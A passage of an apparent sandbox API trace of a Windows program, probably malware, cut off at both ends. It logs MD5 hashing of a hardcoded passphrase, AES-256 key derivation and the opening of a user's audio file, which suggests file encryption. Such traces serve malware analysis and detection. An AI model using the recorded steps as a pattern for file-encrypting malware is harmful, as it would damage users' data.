lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0112.407] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0112.407] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0112.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0112.407] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.408] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0112.408] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0112.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0112.408] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0112.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0112.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0112.408] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0112.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0112.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0112.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.408] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0112.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0112.408] CryptHashData (hHash=0x41ac640, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0112.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.408] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0112.408] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0112.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0112.409] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac2c0) returned 1 [0112.409] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.409] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0112.409] CryptDestroyHash (hHash=0x41ac640) returned 1 [0112.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0112.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0112.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0112.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0112.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0112.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0112.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0112.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0112.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0112.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0112.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0112.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0112.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0112.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0112.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0112.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0112.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0112.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0112.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0112.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0112.411] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0112.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0112.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0112.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0112.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0112.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0112.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0112.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0112.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0112.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0112.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0112.413] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0112.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0112.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0112.413] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0112.413] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0112.413] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0112.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0112.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0112.414] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\JUnckwz0f9.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\junckwz0f9.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0112.414] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.414] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0112.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0112.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0112.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0112.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0112.415] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0112.415] RtlAllocateHeap (HeapHandle=0x1780000, 